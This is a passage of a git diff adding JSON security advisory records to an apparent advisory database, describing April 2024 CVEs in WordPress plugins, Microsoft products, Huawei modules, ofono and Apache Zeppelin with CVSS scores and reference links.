a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2783" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3058859%40gamipress%2Ftrunk&old=3058187%40gamipress%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/720a3525-01dd-4cfd-9403-2bc3f87df618?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q3q6-3x37-g8gw/GHSA-q3q6-3x37-g8gw.json b/advisories/unreviewed/2024/04/GHSA-q3q6-3x37-g8gw/GHSA-q3q6-3x37-g8gw.json new file mode 100644 index 00000000000..c5f2e6bdc4a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q3q6-3x37-g8gw/GHSA-q3q6-3x37-g8gw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3q6-3x37-g8gw", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3214" + ], + "details": "The Relevanssi – A Better Search plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 4.22.1. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3214" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064304/relevanssi/tags/4.22.2/lib/log.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9960bae9-6f19-49eb-8f24-fdde4933671e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q3rj-qhqx-qhgm/GHSA-q3rj-qhqx-qhgm.json b/advisories/unreviewed/2024/04/GHSA-q3rj-qhqx-qhgm/GHSA-q3rj-qhqx-qhgm.json new file mode 100644 index 00000000000..226b4b051b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q3rj-qhqx-qhgm/GHSA-q3rj-qhqx-qhgm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3rj-qhqx-qhgm", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2327" + ], + "details": "The Global Elementor Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link URL in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2327" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/global-elementor-buttons" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d84f9b06-9127-4526-8f17-21608ec2f601?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q4p6-cgp6-mwqw/GHSA-q4p6-cgp6-mwqw.json b/advisories/unreviewed/2024/04/GHSA-q4p6-cgp6-mwqw/GHSA-q4p6-cgp6-mwqw.json new file mode 100644 index 00000000000..38bf6f10dcd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q4p6-cgp6-mwqw/GHSA-q4p6-cgp6-mwqw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4p6-cgp6-mwqw", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2023-4605" + ], + "details": "\nA valid authenticated Lenovo XClarity Administrator (LXCA) user can potentially leverage an unauthenticated API endpoint to retrieve system event information.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4605" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-136592" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q4v8-vmvc-x4jm/GHSA-q4v8-vmvc-x4jm.json b/advisories/unreviewed/2024/04/GHSA-q4v8-vmvc-x4jm/GHSA-q4v8-vmvc-x4jm.json new file mode 100644 index 00000000000..e0950abbd6f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q4v8-vmvc-x4jm/GHSA-q4v8-vmvc-x4jm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4v8-vmvc-x4jm", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3512" + ], + "details": "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'note_color' shortcode in all versions up to, and including, 7.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3512" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3056732%40shortcodes-ultimate&new=3056732%40shortcodes-ultimate&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2024-2583" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/98d8c713-e8cd-4fad-a8fb-7a40db2742a2" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1bae6d3a-40eb-4af6-be4e-9bc6be1a4b07?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q6m7-j3hp-j7rg/GHSA-q6m7-j3hp-j7rg.json b/advisories/unreviewed/2024/04/GHSA-q6m7-j3hp-j7rg/GHSA-q6m7-j3hp-j7rg.json new file mode 100644 index 00000000000..4716c87ea82 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q6m7-j3hp-j7rg/GHSA-q6m7-j3hp-j7rg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6m7-j3hp-j7rg", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2946" + ], + "details": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +12 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's QR Code Widget in all versions up to, and including, 2.8.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2946" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3064259%40woolentor-addons&new=3064259%40woolentor-addons&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e64525-6080-40f3-a296-389b800a5e8a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q6v4-gg2w-f97v/GHSA-q6v4-gg2w-f97v.json b/advisories/unreviewed/2024/04/GHSA-q6v4-gg2w-f97v/GHSA-q6v4-gg2w-f97v.json new file mode 100644 index 00000000000..b60dc2eb61b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q6v4-gg2w-f97v/GHSA-q6v4-gg2w-f97v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6v4-gg2w-f97v", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26207" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26207" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26207" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q6wr-5cjv-cqvh/GHSA-q6wr-5cjv-cqvh.json b/advisories/unreviewed/2024/04/GHSA-q6wr-5cjv-cqvh/GHSA-q6wr-5cjv-cqvh.json new file mode 100644 index 00000000000..1a59359d97e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q6wr-5cjv-cqvh/GHSA-q6wr-5cjv-cqvh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6wr-5cjv-cqvh", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29983" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29983" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29983" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q7jc-6mj7-vqp9/GHSA-q7jc-6mj7-vqp9.json b/advisories/unreviewed/2024/04/GHSA-q7jc-6mj7-vqp9/GHSA-q7jc-6mj7-vqp9.json new file mode 100644 index 00000000000..2e426422a3e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q7jc-6mj7-vqp9/GHSA-q7jc-6mj7-vqp9.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7jc-6mj7-vqp9", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1893" + ], + "details": "The Easy Property Listings plugin for WordPress is vulnerable to time-based SQL Injection via the ‘property_status’ shortcode attribute in all versions up to, and including, 3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1893" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-property-listings/tags/3.5.2/lib/includes/functions.php#L1846" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/easy-property-listings/tags/3.5.2&old=3056209&new_path=/easy-property-listings/tags/3.5.3&new=3056209&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7ac96db-2d9a-4eaf-8916-a02e3e64ca4a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q8c2-3rhw-wc9h/GHSA-q8c2-3rhw-wc9h.json b/advisories/unreviewed/2024/04/GHSA-q8c2-3rhw-wc9h/GHSA-q8c2-3rhw-wc9h.json new file mode 100644 index 00000000000..1c79de51465 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q8c2-3rhw-wc9h/GHSA-q8c2-3rhw-wc9h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8c2-3rhw-wc9h", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26252" + ], + "details": "Windows rndismp6.sys Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26252" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-822" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q9gh-68qf-6p2r/GHSA-q9gh-68qf-6p2r.json b/advisories/unreviewed/2024/04/GHSA-q9gh-68qf-6p2r/GHSA-q9gh-68qf-6p2r.json new file mode 100644 index 00000000000..7d48d32ff42 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q9gh-68qf-6p2r/GHSA-q9gh-68qf-6p2r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9gh-68qf-6p2r", + "modified": "2024-04-09T15:30:38Z", + "published": "2024-04-09T15:30:38Z", + "aliases": [ + "CVE-2024-21756" + ], + "details": "A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSandbox version 4.4.0 through 4.4.3 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.4 allows attacker to execute unauthorized code or commands via crafted requests..", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21756" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-489" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qc5p-mrgm-82mp/GHSA-qc5p-mrgm-82mp.json b/advisories/unreviewed/2024/04/GHSA-qc5p-mrgm-82mp/GHSA-qc5p-mrgm-82mp.json new file mode 100644 index 00000000000..6aea3b161a3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qc5p-mrgm-82mp/GHSA-qc5p-mrgm-82mp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc5p-mrgm-82mp", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26209" + ], + "details": "Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26209" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26209" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-908" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qc8v-ph93-7gqw/GHSA-qc8v-ph93-7gqw.json b/advisories/unreviewed/2024/04/GHSA-qc8v-ph93-7gqw/GHSA-qc8v-ph93-7gqw.json new file mode 100644 index 00000000000..0bdb0e45b8e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qc8v-ph93-7gqw/GHSA-qc8v-ph93-7gqw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc8v-ph93-7gqw", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-21324" + ], + "details": "Microsoft Defender for IoT Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21324" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21324" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json b/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json new file mode 100644 index 00000000000..033e79c3a6c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcfj-j39h-f57v", + "modified": "2024-04-08T12:30:31Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2024-23190" + ], + "details": "Upsell shop information of an account can be manipulated to execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to a users account or an successful social engineering attack to lure users to maliciously configured accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-defined upsell content has been improved. No publicly available exploits are known.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23190" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.21" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.22" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2024/oxas-adv-2024-0001.json" + }, + { + "type": "WEB", + "url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6268_7.10.6_2024-02-08.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qcfv-94fj-42jc/GHSA-qcfv-94fj-42jc.json b/advisories/unreviewed/2024/04/GHSA-qcfv-94fj-42jc/GHSA-qcfv-94fj-42jc.json new file mode 100644 index 00000000000..a789efb0a6f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qcfv-94fj-42jc/GHSA-qcfv-94fj-42jc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcfv-94fj-42jc", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52714" + ], + "details": "Vulnerability of defects introduced in the design process in the hwnff module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52714" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qcrm-33g9-cjcc/GHSA-qcrm-33g9-cjcc.json b/advisories/unreviewed/2024/04/GHSA-qcrm-33g9-cjcc/GHSA-qcrm-33g9-cjcc.json new file mode 100644 index 00000000000..e2c00a5b264 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qcrm-33g9-cjcc/GHSA-qcrm-33g9-cjcc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcrm-33g9-cjcc", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2023-2794" + ], + "details": "A flaw was found in ofono, an Open Source Telephony on Linux. A stack overflow bug is triggered within the decode_deliver() function during the SMS decoding. It is assumed that the attack scenario is accessible from a compromised modem, a malicious base station, or just SMS. There is a bound check for this memcpy length in decode_submit(), but it was forgotten in decode_deliver().", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2794" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255387" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T11:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qfrm-3569-884r/GHSA-qfrm-3569-884r.json b/advisories/unreviewed/2024/04/GHSA-qfrm-3569-884r/GHSA-qfrm-3569-884r.json new file mode 100644 index 00000000000..46e9e9bb565 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qfrm-3569-884r/GHSA-qfrm-3569-884r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfrm-3569-884r", + "modified": "2024-04-07T09:30:28Z", + "published": "2024-04-07T09:30:28Z", + "aliases": [ + "CVE-2024-30414" + ], + "details": "Command injection vulnerability in the AccountManager module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30414" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qg8g-vp27-m3p5/GHSA-qg8g-vp27-m3p5.json b/advisories/unreviewed/2024/04/GHSA-qg8g-vp27-m3p5/GHSA-qg8g-vp27-m3p5.json new file mode 100644 index 00000000000..b80ddf53aae --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qg8g-vp27-m3p5/GHSA-qg8g-vp27-m3p5.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg8g-vp27-m3p5", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-2444" + ], + "details": "The Inline Related Posts WordPress plugin before 3.5.0 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2444" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/214e5fd7-8684-418a-b67d-60b1dcf11a48" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qh29-9j77-hqw6/GHSA-qh29-9j77-hqw6.json b/advisories/unreviewed/2024/04/GHSA-qh29-9j77-hqw6/GHSA-qh29-9j77-hqw6.json new file mode 100644 index 00000000000..a6fa8db5aaf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qh29-9j77-hqw6/GHSA-qh29-9j77-hqw6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qh29-9j77-hqw6", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1289" + ], + "details": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.6.3 due to missing validation on a user controlled key when looking up order information. This makes it possible for authenticated attackers to obtain information on orders placed by other users and guests, which can be leveraged to sign up for paid courses that were purchased by guests. Emails of other users are also exposed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1289" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042945%40learnpress%2Ftags%2F4.2.6.3&new=3061851%40learnpress%2Ftags%2F4.2.6.4" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c410d91-08cc-496d-9c8e-c57f107399da?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qmr3-52xf-wmhx/GHSA-qmr3-52xf-wmhx.json b/advisories/unreviewed/2024/04/GHSA-qmr3-52xf-wmhx/GHSA-qmr3-52xf-wmhx.json new file mode 100644 index 00000000000..4fa05428970 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qmr3-52xf-wmhx/GHSA-qmr3-52xf-wmhx.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmr3-52xf-wmhx", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-31867" + ], + "details": "Improper Input Validation vulnerability in Apache Zeppelin.\n\nThe attackers can execute malicious queries by setting improper configuration properties to LDAP search filter.\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + 